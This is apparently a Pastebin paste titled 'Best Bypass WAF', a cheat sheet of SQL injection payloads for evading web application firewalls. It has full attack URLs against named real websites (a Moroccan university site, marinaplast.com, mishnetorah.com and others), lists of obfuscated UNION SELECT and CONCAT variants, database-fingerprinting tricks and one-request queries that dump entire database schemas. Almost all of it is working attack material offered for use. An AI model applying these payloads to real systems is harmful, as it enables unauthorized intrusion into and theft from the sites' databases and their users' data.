API tools faq
paste
kedjaw3n

Untitled

kedjaw3n
Jan 15th, 2020
117
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 36.55 KB | None | 0 0
raw download clone embed print report diff
  1. ------------------------------Best Bypass WAF------------------------------------
  2. zen solution:::http://www.univcasa.ma/factualite.php?id=318999 UNIUNIONON+ALL+SELSELECTECT+1,2,3,4,5,6,7,8,9,10,11,12,CoNCat%0a(0x3c62723e3c666f6e7420636f6c6f723d5265642073697a653d333e496e6a3363743364204279205a656e3c62723e56657273696f6e203a20,version(),0x3c62723e557365722829203a20,user(),0x3c62723e4462617365203a20,dATAbASe(),(sELsELecTecT(@)frfromom(sELfromecT(@:=0x00),(sELfromecT(@)frfromom(`InFoRMAfromtiON_sCHeMa`.`ColUfromMNs`)whunionere(`TAbunionlE_sCHunionemA`=DatAbAsE())and(@)in(@:=CoNCat(@,0x3c62723e5461626c6520466f756e64203a20,TaBunionLe_nAMe,0x3a3a,coluunionmn_name))))a)),14,15,16,17%23
  3. gawd's solution::::http://www.univcasa.ma/factualite.php?id=-318++UNIunionON+ALL+SELSELECTECT+1,2,3,4,5,6,7,8,9,10,11,12,CONCAT%280x526168756c203a33,0x3c42723e,user%28%29,0x3c42723e,@@VERSION,0x3c42723e,%28SELESELECTCT%28@x%29FROFROMM%28SELESELECTCT%28@x:=0x00%29,%28@NR:=0%29,%28SELESELECTCT%280%29FROFROMM%28INFORMATIINFORMATION_SCHEMAON_SCHEMA.ColColumnsumns%29WHWHEREERE%28TABLE_STABLE_SCHEMACHEMA!=0x696e666f726d6174696f6e5f736368656d61%29AND%280x00%29IN%28@x:=CONCAT%28@x,LPAD%28@NR:=@NR%2b1,4,0x30%29,0x3a20,table_name,0x3a,column_ncolumn_nameame,0x3c62723e%29%29%29%29x%29%29,14,15,16,17--+-
  4. ashfaq bro's solution::: http://www.univcasa.ma/factualite.php?id=318 and 0 UnunionION SeLselectEct 1,2,3,4,5,6,7,8,9,0,11,12,concat('rootxx',version(),'<br>',(SeLselectEct (@x)frFROMom(SeLselectEct (@x:=0x00),(@NR:=0),(SeLselectEct (0)frFROMom(informationINFORMATION_SCHEMA_schema.TABLES)whWHEREere(tableTABLE_SCHEMA_schema!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,2,0x30),0x3a20,/*!12345Table_NSELECTamE*/,0x3c62723e))))x)),14,15,16,17--
  5. kazam gujjar :::http://www.univcasa.ma/factualite.php?id=-318888888888888+unUNIONion+ALL+seSELECTlect+1,2,3,4,5,6,7,8,9,10,11,12,concat%280x3c62723e,0x3c666f6e7420636f6c6f723d626c75652073697a653d35203e202d2d3d3d3e206b34346a3167756a6a34722068337233203c3d3d2d2d203c2f666f6e743e,0x3c62723e,0x56455253494f4e3d,version%28%29,0x3c62723e,0x555345523d,user%28%29,0x3c62723e,0x44423d,database%28%29,%20make_set%286,@:=0x0a,%28seSELECTlect%281%29frFROMom%28inINFORMATION_SCHEMAformation_schema.coCOLUMNSlumns%29whWHEREere%28taTABLE_SCHEMAble_schema!=0x696e666f726d6174696f6e5f736368656d61%29and@:=make_set%28511,@,0x3c6c693e,TaBlE_NaMe,coCOLUMN_NAMElumn_name%29%29,@%29%29,14,15,16,17--+
  6. very hard waf
  7.  
  8. http://www.geneticsandsociety.org/article.php?id=305 and true Union%A0%20%20%
  9. 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
  10. 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
  11. 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
  12. 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Select '0
  13. and false Un\ion Select c\oncat(0x3\c62723e3c666f6e7420636f6c6f723d7265643e72306f744
  14. 048335834393c2f666f6e743e3c666f6e7420636f6c6f723d677265656e3e,0x3\c62723e3c
  15. 666f6e7420636f6c6f723d626c75653e2056657273696f6e203a3a3a203c666f6e7420636f6
  16. c6f723d677265656e3e,v\ersion(),0x3\c62723e3c666f6e7420636f6c6f723d626c75653e20446174616261
  17. 7365203a3a3a203c666f6e7420636f6c6f723d677265656e3e,d\atabase(),0x3\c62723e3c666f6e7420636f
  18. 6c6f723d626c75653e2055736572203a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,U\ser
  19. (),0x3\c62723e3c666f6e7420636f6c6f723d7265643e205461626c6573203a203c666f6e7420636f6
  20. c6f723d677265656e3e,c\oncat_ws(0x20,@:=0x00,(Select(t\able_name)fr\om(information_s\chema.
  21. t\ables)+wh\ere+(t\able_s\chema = d\atabase())+an\d@:=c\oncat_ws(0x20,@,0x3\c6c
  22. 693e3c666f6e7420636f6c6f723d7265643e,t\able_name,0x3\c2f666f6e743e)),@)),0x
  23. 32,0x33,0x34--'%20
  24.  
  25. www.itpark.am/floor.php?lang=us&build=B'and@x:=C%5CON%5CCAT(ver%5Csion(),0x3a,data%5Cbase(),0x3a3a,u%5Cs%5Cer%5C(%5C),0x3c62723e,(SELE%5CCT+GROUP_CON%5CCAT(TAB%5CLE_NA%5CME+separator+0x3c6c693e)FR%5COM+INFORMATION_S%5CCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATA%5CBASE()))UNION+SELE%5CCT+CON%5CCAT(0x273e,0x3c62723e,'~m@db100d~',@x,0x3c212d2d)%60&floor=null&go=null
  26.  
  27. [~] order by [~]
  28. /**/ORDER/**/BY/**/
  29. /*!order*/+/*!by*/
  30. /*!ORDER BY*/
  31. /*!50000ORDER BY*/
  32. /*!50000ORDER*//**//*!50000BY*/
  33. /*!12345ORDER*/+/*!BY*/
  34.  
  35. [~] UNION select [~]
  36. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  37. %55nion(%53elect 1,2,3)-- -
  38. +union+distinct+select+
  39. +union+distinctROW+select+
  40. /**//*!12345UNION SELECT*//**/
  41. /**//*!50000UNION SELECT*//**/
  42. /**/UNION/**//*!50000SELECT*//**/
  43. /*!50000UniON SeLeCt*/
  44. union /*!50000%53elect*/
  45. + #?uNiOn + #?sEleCt
  46. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  47. /*!%55NiOn*/ /*!%53eLEct*/
  48. /*!u%6eion*/ /*!se%6cect*/
  49. +un/**/ion+se/**/lect
  50. uni%0bon+se%0blect
  51. %2f**%2funion%2f**%2fselect
  52. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  53. REVERSE(noinu)+REVERSE(tceles)
  54. /*--*/union/*--*/select/*--*/
  55. union (/*!/**/ SeleCT */ 1,2,3)
  56. /*!union*/+/*!select*/
  57. union+/*!select*/
  58. /**/union/**/select/**/
  59. /**/uNIon/**/sEleCt/**/
  60. +%2F**/+Union/*!select*/
  61. /**//*!union*//**//*!select*//**/
  62. /*!uNIOn*/ /*!SelECt*/
  63. +union+distinct+select+
  64. +union+distinctROW+select+
  65. uNiOn aLl sElEcT
  66. UNIunionON+SELselectECT
  67. /**/union/*!50000select*//**/
  68. 0%a0union%a0select%09
  69. %0Aunion%0Aselect%0A
  70. %55nion/**/%53elect
  71. uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  72. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  73. %0A%09UNION%0CSELECT%10NULL%
  74. /*!union*//*--*//*!all*//*--*//*!select*/
  75. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  76. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  77. +UnIoN/*&a=*/SeLeCT/*&a=*/
  78. union+sel%0bect
  79. +uni*on+sel*ect+
  80. +#1q%0Aunion all#qa%0A#%0Aselect
  81. union(select (1),(2),(3),(4),(5))
  82. UNION(SELECT(column)FROM(table))
  83. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  84. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  85. union(select(1),2,3)
  86. union (select 1111,2222,3333)
  87. uNioN (/*!/**/ SeleCT */ 11)
  88. union (select 1111,2222,3333)
  89. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  90. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  91. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  92. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  93. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  94. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  95. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  96. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  97. /union\sselect/g
  98. /union\s+select/i
  99. /*!UnIoN*/SeLeCT
  100. +UnIoN/*&a=*/SeLeCT/*&a=*/
  101. +uni>on+sel>ect+
  102. +(UnIoN)+(SelECT)+
  103. +(UnI)(oN)+(SeL)(EcT)
  104. +’UnI”On’+'SeL”ECT’
  105. +uni on+sel ect+
  106. +/*!UnIoN*/+/*!SeLeCt*/+
  107. /*!u%6eion*/ /*!se%6cect*/
  108. uni%20union%20/*!select*/%20
  109. union%23aa%0Aselect
  110. /**/union/*!50000select*/
  111. /^.*union.*$/ /^.*select.*$/
  112. /*union*/union/*select*/select+
  113. /*uni X on*/union/*sel X ect*/
  114. +un/**/ion+sel/**/ect+
  115. +UnIOn%0d%0aSeleCt%0d%0a
  116. UNION/*&test=1*/SELECT/*&pwn=2*/
  117. un?<ion sel="">+un/**/ion+se/**/lect+
  118. +UNunionION+SEselectLECT+
  119. +uni%0bon+se%0blect+
  120. %252f%252a*/union%252f%252a /select%252f%252a*/
  121. /%2A%2A/union/%2A%2A/select/%2A%2A/
  122. %2f**%2funion%2f**%2fselect%2f**%2f
  123. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  124. /*!UnIoN*/SeLecT+
  125.  
  126. [~] information_schema.tables [~]
  127. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  128. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  129. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  130. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  131. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  132. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  133.  
  134. [~] concat() [~]
  135. CoNcAt()
  136. concat()
  137. CON%08CAT()
  138. CoNcAt()
  139. %0AcOnCat()
  140. /**//*!12345cOnCat*/
  141. /*!50000cOnCat*/(/*!*/)
  142. unhex(hex(concat(table_name)))
  143. unhex(hex(/*!12345concat*/(table_name)))
  144. unhex(hex(/*!50000concat*/(table_name)))
  145.  
  146. [~] group_concat() [~]
  147. /*!group_concat*/()
  148. gRoUp_cOnCAt()
  149. group_concat(/*!*/)
  150. group_concat(/*!12345table_name*/)
  151. group_concat(/*!50000table_name*/)
  152. /*!group_concat*/(/*!12345table_name*/)
  153. /*!group_concat*/(/*!50000table_name*/)
  154. /*!12345group_concat*/(/*!12345table_name*/)
  155. /*!50000group_concat*/(/*!50000table_name*/)
  156. /*!GrOuP_ConCaT*/()
  157. /*!12345GroUP_ConCat*/()
  158. /*!50000gRouP_cOnCaT*/()
  159. /*!50000Gr%6fuP_c%6fnCAT*/()
  160. unhex(hex(group_concat(table_name)))
  161. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  162. unhex(hex(/*!12345group_concat*/(table_name)))
  163. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  164. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  165. unhex(hex(/*!50000group_concat*/(table_name)))
  166. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  167. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  168. convert(group_concat(table_name)+using+ascii)
  169. convert(group_concat(/*!table_name*/)+using+ascii)
  170. convert(group_concat(/*!12345table_name*/)+using+ascii)
  171. convert(group_concat(/*!50000table_name*/)+using+ascii)
  172. CONVERT(group_concat(table_name)+USING+latin1)
  173. CONVERT(group_concat(table_name)+USING+latin2)
  174. CONVERT(group_concat(table_name)+USING+latin3)
  175. CONVERT(group_concat(table_name)+USING+latin4)
  176. CONVERT(group_concat(table_name)+USING+latin5)
  177.  
  178. [~] after id no. like id=1 +/*!and*/+1=0 [~]
  179. +div+0
  180. Having+1=0
  181. +AND+1=0
  182. +/*!and*/+1=0
  183. and(1)=(0)
  184.  
  185. --'- : +--+ / : -- - : --+- : /*
  186. ) order by 1-- -
  187. ') order by 1-- -
  188. ')order by 1%23%23
  189. %')order by 1%23%23
  190. Null' order by 100--+
  191. Null' order by 9999--+
  192. ')group by 99-- -
  193. 'group by 119449-- -
  194. 'group/**/by/**/99%23%23
  195. union select ByPassing method
  196. +union+distinct+select+
  197. +union+distinctROW+select+
  198. /**//*!12345UNION SELECT*//**/
  199. /**//*!50000UNION SELECT*//**/
  200. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  201. +/*!u%6eion*/+/*!se%6cect*/+
  202. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  203. 1%')and(0)union(select(1),version(),3,4,5,6)%
  204. 23%23%23
  205. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  206. union /*!50000%53elect*/
  207. %55nion %53elect
  208. +--+Union+--+Select+--+
  209. +UnIoN/*&a=*/SeLeCT/*&a=*/
  210. id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
  211. id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
  212. UnIoN SeLeCt CoNcAt(version())--
  213. uNiOn aLl sElEcT
  214. uUNIONnion all sSELECTelect
  215. ==============================
  216. ==============================
  217. ==============================
  218. =========================================
  219. :: Buffer Overflow ::
  220. ==============================
  221. ==============================
  222. ==============================
  223. =========================================
  224. +And(select 1)=(select 0×414)+union+select+1–
  225. +And(select 1)=(select 0xAAAA)+union+select
  226. +1–
  227. +And(select 1)=(select 0×4141414141414
  228. 141414141414141414141414141414
  229. 141414141414141414141414141414
  230. 141414141414141414141414141414
  231. 141414141414141414141414141414
  232. 14141414141414141414 141414141414141
  233. 414141414141414141414141414141
  234. 41414141414141414141414141414141414
  235. 141414141414141414141414141414
  236. 141414141414141414141414141414
  237. 14141414141414141414 141414141414141
  238. 414141414141414141414141414141
  239. 41414141414141414141414141414141414
  240. 141414141414141414141414141414
  241. 141414141414141414141414141414
  242. 14141414141414141414 141414141414141
  243. 414141414141414141414141414141
  244. 41414141414141414141414141414141414
  245. 141414141414141414141414141414
  246. 141414141414141414141414141414
  247. 14141414141414141414 141414141414141
  248. 414141414141414141414141414141
  249. 41414141414141414141414141414141414
  250. 1414141)+
  251. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  252. ==============================
  253. ==============================
  254. ==============================
  255. ========================================
  256. :: 400 Bad Request ::
  257. ==============================
  258. ==============================
  259. ==============================
  260. ========================================
  261. –+%0A
  262. union+select+1–+%0A,2–+%0A,3–+%0A,4–+
  263. %0A,5–+%0A –
  264. ==============================
  265. ==============================
  266. ==============================
  267. ========================================
  268. null the parameter
  269. ==============================
  270. ==============================
  271. ==============================
  272. ========================================
  273. id=-1
  274. id=null
  275. id=1+and+false+
  276. id=9999
  277. id=1 and 0
  278. id==1
  279. id=(-1)
  280. ==============================
  281. ==============================
  282. ==============================
  283. ==============================
  284. ===============
  285. Group_Concat
  286. ==============================
  287. ==============================
  288. ==============================
  289. ==============================
  290. ===============
  291. Group_Concat
  292. group_concat()
  293. /*!group_concat*/()
  294. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  295. group_concat(,0x3c62723e)
  296. g%72oup_c%6Fncat%28%76%65rsion%28%29,
  297. %22~BlackRose%22%29
  298. CoNcAt()
  299. CONCAT(DISTINCT Version())
  300. concat(,0x3a,)
  301. concat%00()
  302. %00CoNcAt()
  303. /*!50000cOnCat*/(/*!Version()*/)
  304. /*!50000cOnCat*/
  305. /**//*!12345cOnCat*/(,0x3a,)
  306. concat_ws()
  307. concat(0x3a,,0x3c62723e)
  308. /*!concat_ws(0x3a,)*/
  309. concat_ws(0x3a3a3a,version()
  310. CONCAT_WS(CHAR(32,58,32),version(),)
  311. REVERSE(tacnoc)
  312. binary(version())
  313. uncompress(compress(version()))
  314. aes_decrypt(aes_encrypt(version(),1),1)
  315. ==============================
  316. ==============================
  317. ==============================
  318. ==============================
  319. ============
  320. To appear column numbr in page put after id
  321. ==============================
  322. ==============================
  323. ==============================
  324. ==============================
  325. ============
  326. id=1+and+1=0+union+select+1,2,3,4,5,6
  327. +AND+1=0
  328. /*!aND*/ 1 like 0
  329. +/*!and*/+1=0
  330. +and+2>3+
  331. +and(1)=(0)
  332. and (1)!=(0)
  333. +div+0
  334. Having+1=0
  335. ==============================
  336. ==============================
  337. ==============================
  338. =========================================
  339. function ByPassing
  340. ==============================
  341. ==============================
  342. ==============================
  343. =========================================
  344. unhex(hex(value))
  345. cast(value as char)
  346. uncompress(compress(version()))
  347. cast(version() as char)
  348. aes_decrypt(aes_encrypt(version(),1),1)
  349. binary(version())
  350. convert(value using ascii)
  351. ==============================
  352. ==============================
  353. ==============================
  354. =========================================
  355. avoid source page injection
  356. ==============================
  357. ==============================
  358. ==============================
  359. =========================================
  360. concat(?”>,<br><br><br>,@@version,?<img
  361. src=”,?<?’#)
  362. “><br>? <img src=”
  363. <img src=””/>injection<img src=”
  364. concat(0x223e,@@version)
  365. concat(0x273e27,version(),0x3c212d2d)
  366. concat(0x223e3c62723e,version
  367. (),0x3c696d67207372633d22)
  368. concat(0x223e,@@version,0x3c69
  369. 6d67207372633d22)
  370. concat(0x223e,0x3c62723e3c6272
  371. 3e3c62723e,@@version,0x3c696d6
  372. 7207372633d22,0x3c62723e)
  373. concat(0x223e3c62723e,@@versio
  374. n,0x3a,”BlackRose”,0x3c696d67207372633d22)
  375. concat(‘</title>’,@@version,’<title>’)
  376. concat(0x273c2f7469746c653e27,
  377. @@version,0x273c7469746c653e27)
  378. concat(0x273c2f7469746c653e27,version
  379. (),0x273c7469746c653e27)
  380. ==============================
  381. ==============================
  382. ==============================
  383. =========================================
  384. get version – DB_NAME – user – HOST_NAME –
  385. datadir
  386. ==============================
  387. ==============================
  388. ==============================
  389. =========================================
  390. version()
  391. convert(version() using latin1)
  392. unhex(hex(version()))
  393. @@GLOBAL.VERSION
  394. (substr(@@version,1,1)=5) :: 1 true 0 fals
  395. # like #
  396. http://www.marinaplast.com/page.php?id=-13
  397. union select 1,2,(substr(@@version,1,1)=5),4,5 –
  398. ==============================
  399. ==============================
  400. ==============================
  401. ========================================
  402. +and substring(version(),1,1)=4
  403. +and substring(version(),1,1)=5
  404. +and substring(version(),1,1)=9
  405. +and substring(version(),1,1)=10
  406. id=1 /*!50094aaaa*/ error
  407. id=1 /*!50095aaaa*/ no error
  408. id=1 /*!50096aaaa*/ error
  409. # like # http://www.marinaplast.com/page.php?
  410. id=13 /*!50095aaaa*/
  411. id=1 /*!40123 1=1*/–+- no error
  412. id=1 /*!40122rrrr*/ no error
  413. # like # http://www.marinaplast.com/page.php?
  414. id=13 /*!40122rrrr*/ error not v4
  415. ==============================
  416. ==============================
  417. ==============================
  418. =======================================
  419. DB_NAME()
  420. ==============================
  421. ==============================
  422. ==============================
  423. =======================================
  424. @@database
  425. database()
  426. id=vv()
  427. # like # http://www.marinaplast.com/page.php?
  428. id=-13 union select 1,2,DB_NAME(),4,5 –
  429. http://www.marinaplast.com/page.php?id=vv()
  430. @@user
  431. user()
  432. user_name()
  433. system_user()
  434. # like # http://www.marinaplast.com/page.php?
  435. id=-13 union select 1,2,user(),4,5 –
  436. HOST_NAME()
  437. @@hostname
  438. @@servername
  439. SERVERPROPERTY()
  440. # like # http://www.marinaplast.com/page.php?
  441. id=-13 union select 1,2,HOST_NAME(),4,5 –
  442. @@datadir
  443. datadir()
  444. # like # http://www.marinaplast.com/page.php?
  445. id=-13 union select 1,2,datadir(),4,5 –
  446. ASPX
  447. and 1=0/@@version
  448. ‘ and 1=0/@@version;–
  449. ‘) and 1=@@version–
  450. and 1=0/user;–
  451. Requested method
  452. [DUMP DB in 1 Request]
  453. (select (@) from (select(@:=0×00),(select (@)
  454. from (information_schema.columns) where
  455. (table_schema>=@) and (@)in (@:=concat(@,0x
  456. 0a,’ [ ',table_schema,' ] >’,table_name,’ >
  457. ‘,column_name))))x)
  458. (select(@) from (select (@:=0×00),(select (@)
  459. from (table) where (@) in (@:=concat(@,0x
  460. 0a,column1,0x3a,column2))))a)
  461. ==============================
  462. ==============================
  463. ==============================
  464. =========================================
  465. [DUMP DB in 1 Request improve]
  466. ==============================
  467. ==============================
  468. ==============================
  469. =========================================
  470. (select(@x)from(select(@x:=0×00),(select(0)fr
  471. om(information_schema.columns)where
  472. (table_schema!=0x696e666f726d6174696f6e5
  473. f736368656d61)and(0×00)in(@x:=concat
  474. (@x,0x3c62723e,table_schema,0x2e,table_
  475. name,0x3a,column_name))))x)
  476. like
  477. http://www.marinaplast.com/page.php?id=-13
  478. union select 1,2,(select(@x)from(select(@x:
  479. =0×00),(select(0)from(information_schema.colu
  480. mns)where(table_schema!=0x696e
  481. 666f726d6174696f6e5f736368656d61)and
  482. (0×00)in(@x:=c oncat(@x,0x3c62
  483. 723e,table_schema,0x2e,table_n
  484. ame,0x3a,column_name))))x),4,5 –
  485. ==============================
  486. ==============================
  487. ==============================
  488. =========================================
  489. #2#
  490. ==============================
  491. ==============================
  492. ==============================
  493. =========================================
  494. method like DUMP DB in 1 Request
  495. ==============================
  496. ==============================
  497. ==============================
  498. =========================================
  499. concat(@i:=0×00,@o:=0xd0a,benchmark
  500. (40,@o:=CONCAT( @o,0xd0a,(SELECT concat
  501. (table_schema,0x2E,@i:=table_name) FROM
  502. information_schema.tables WHERE
  503. table_name>@i order by table_name LIMIT 1)))
  504. like
  505. http://www.mishnetorah.com/shop/details.php?
  506. id=-26+union+select+1,2,3,concat
  507. (@i:=0×00,@o:=0xd0a,benchmark(
  508. 40,@o:=CONCAT(@o,0xd0a ,(SELECT concat
  509. (table_schema,0x2E,@i:=table_name) FROM
  510. information_schema.tables WHERE
  511. table_name>@i order by table_name LIMIT
  512. 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,
  513. 16,17,18,19,20,21
  514. ==============================
  515. ==============================
  516. ==============================
  517. =========================================
  518. #3#
  519. ==============================
  520. ==============================
  521. ==============================
  522. =========================================
  523. databases
  524. (select+count(schema_name) +from+informati
  525. on_schema.schemata)
  526. # like #
  527. http://www.marinaplast.com/page.php?id=-13
  528. union select 1,2,(select+count(schema_name)
  529. +from+information_schema.schemata),4,5 –
  530. tables
  531. (select+count(table_name) +from+informati
  532. on_schema.tables)
  533. # like #
  534. http://www.marinaplast.com/page.php?id=-13
  535. union select 1,2,(select+count(table_name) +from
  536. +information_schema.tables),4,5 –
  537. columns
  538. (select+count(column_name) +from+informati
  539. on_schema.columns)
  540. # like #
  541. http://www.marinaplast.com/page.php?id=-13
  542. union select 1,2,(select+count(column_name)
  543. +from+information_schema.columns),4,5 –
  544. ==============================
  545. ==============================
  546. ==============================
  547. =========================================
  548. #4#
  549. ==============================
  550. ==============================
  551. ==============================
  552. =========================================
  553. show the table with all her columns
  554. CONCAT(table_name,0x3e,GROUP_CONCAT
  555. (column_name))
  556. +FROM information_schema.columns WHERE
  557. table_schema=database() GROUP BY table_name
  558. LIMIT 1,1–+
  559. like
  560. http://www.marinaplast.com/page.php?id=-13
  561. union select 1,2,CONCAT(table_name,0x3e,GRO
  562. UP_CONCAT(column_name)),4,5 +FROM
  563. information_schema.columns WHERE
  564. table_schema=database() GROUP BY table_name
  565. LIMIT 0,1–+
  566. ==============================
  567. ==============================
  568. ==============================
  569. =========================================
  570. #5#WWWWWWWWWWWAAAAAAAAAAAAAAAA
  571. AAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
  572. ==============================
  573. ==============================
  574. ==============================
  575. =========================================
  576. feltered requested
  577. # tables #
  578. group_concat(/*!table_name*/)
  579. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -
  580. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!
  581. WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -
  582. /*!From*/+%69nformation_schema./**/tAblES+/
  583. *!50000Where*/+/*!%54able_ScHEmA*/=schEMA
  584. ()– -
  585. ==============================
  586. ==============================
  587. ==============================
  588. =========================================
  589. # columns #
  590. ==============================
  591. ==============================
  592. ==============================
  593. =========================================
  594. group_concat(/*!column_name*/)
  595. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!
  596. WheRe*/ /*!tAblE_naMe*/=hex table
  597. /*!From*/+%69nformation_schema./**/columns
  598. +/*!50000Where*/+/*!%54able_name*/=hex
  599. table
  600. /*!froM*/ table– -
  601. ==============================
  602. ==============================
  603. ==============================
  604. =========================================
  605. #6#
  606. ==============================
  607. ==============================
  608. ==============================
  609. =========================================
  610. bypass method
  611. (select+group_concat(/*!table_name*/)+/*!
  612. From*/+%69nformation_schema./**/tAblES+/*!
  613. 50000Where*/+/*!%54able_ScHEmA*/=schEMA
  614. ())
  615. (select+group_concat(/*!column_name*/)+/*!
  616. From*/+%69nformation_schema./**/columns+/*!
  617. 50000Where*/+/*!%54able_name*/=hex table)
  618. like
  619. http://www.marinaplast.com/page.php?id=-13
  620. union select 1,2,(select+group_concat(/*!
  621. table_name*/)+/*!From*/+%69nformation_s
  622. chema./**/tAblES+/*!50000Where*/+/*!
  623. %54able_ScHEmA*/=schEMA()),4,5 –
  624. ==============================
  625. ==============================
  626. ==============================
  627. =========================================
  628. #7#
  629. ==============================
  630. ==============================
  631. ==============================
  632. =========================================
  633. bypass method
  634. unhex(hex(Concat(Column_Name,0
  635. x3e,Table_schema,0x3e,table_Name)))
  636. /*!from*/information_schema.columns/*!where*/
  637. column_name%20/*!like*/char(37,%20112,%
  638. 2097,%20115,%20115,%2037)
  639. like
  640. http://www.marinaplast.com/page.php?id=-13
  641. union select 1,2,unhex(hex(Concat(Column_Na
  642. me,0x3e,Table_schema,0x3e,tabl
  643. e_Name))),4,5 /*!from*/information_sche
  644. ma.columns/*!where*/column_name%20/*!like*/
  645. char(37,%20112,%2097,%20115,%20115,
  646. %2037)–
  647. ==============================
  648. ==============================
  649. ==============================
  650. =========================================
  651. [+] Union Select:
  652. ==============================
  653. ==============================
  654. ==============================
  655. =========================================
  656. union /*!select*/+
  657. union/**/select/**/
  658. /**/union/**/select/**/
  659. /**/union/*!50000select*/
  660. /**//*!12345UNION SELECT*//**/
  661. /**//*!50000UNION SELECT*//**/
  662. /**/uniUNIONon/**/selSELECTect/**/
  663. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  664. /**//*!union*//**//*!select*//**/
  665. /**/UNunionION/**/SELselectECT/**/
  666. /**//*UnIOn*//**//*SEleCt*//**/
  667. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//
  668. *l*//*e*//*C*//*t*//**/
  669. /**/UNunionION/**/all/**/SELselectECT/**/
  670. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  671. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//
  672. *S*//*E*//*l*//*e*//*C*//*t*//**/
  673. uni<on all sel<ect
  674. %20union%20/*!select*/%20
  675. union%23aa%0Aselect
  676. union+distinct+select+
  677. union+distinctROW+select+
  678. /*!20000%0d%0aunion*/+/*!20000%0d%0aSel
  679. Ect*/
  680. %252f%252a*/UNION%252f%252a /SELECT
  681. %252f%252a*/
  682. %23sexsexsex%0AUnIOn%23sexsexsex
  683. %0ASeLecT+
  684. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  685. /*!u%6eion*/+/*!se%6cect*/+
  686. 1%’)and(0)union(select(1),version(),3,4,5,6)%
  687. 23%23%23
  688. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  689. union /*!50000%53elect*/
  690. +%2F**/+Union/*!select*/
  691. %55nion %53elect
  692. +–+Union+–+Select+–+
  693. +UnIoN/*&a=*/SeLeCT/*&a=*/
  694. uNiOn aLl sElEcT
  695. uUNIONnion all sSELECTelect
  696. union(select(1),2,3)
  697. union (select 1111,2222,3333)
  698. union (/*!/**/ SeleCT */ 11)
  699. %0A%09UNION%0CSELECT%10NULL%
  700. /*!union*//*–*//*!all*//*–*//*!select*/
  701. union%23foo*%2F*bar%0D%0Aselect%23foo
  702. %0D%0A1% 2C2%2C
  703. union+sel%0bect
  704. +uni*on+sel*ect+
  705. + #1q %0Aunion all#qa%0A#%0Aselect
  706. 1,2,3,4,5,6,7,8,9,10%0A#a
  707. union(select (1),(2),(3),(4),(5))
  708. UNION(SELECT(column)FROM(table))
  709. id=1+’UnI”On’+’SeL”ECT’ <-MySQL only
  710. id=1+’UnI’||’on’+SeLeCT’ <-MSSQL only
  711. union select 1–+%0A,2–+%0A,3–+%0A etc ….
  712. ==============================
  713. ==============================
  714. ==============================
  715. =========================================
  716. [+] Buffer overflow:
  717. ==============================
  718. ==============================
  719. ==============================
  720. =========================================
  721. +And(select 1)=(select 0×414)+union+select+1–
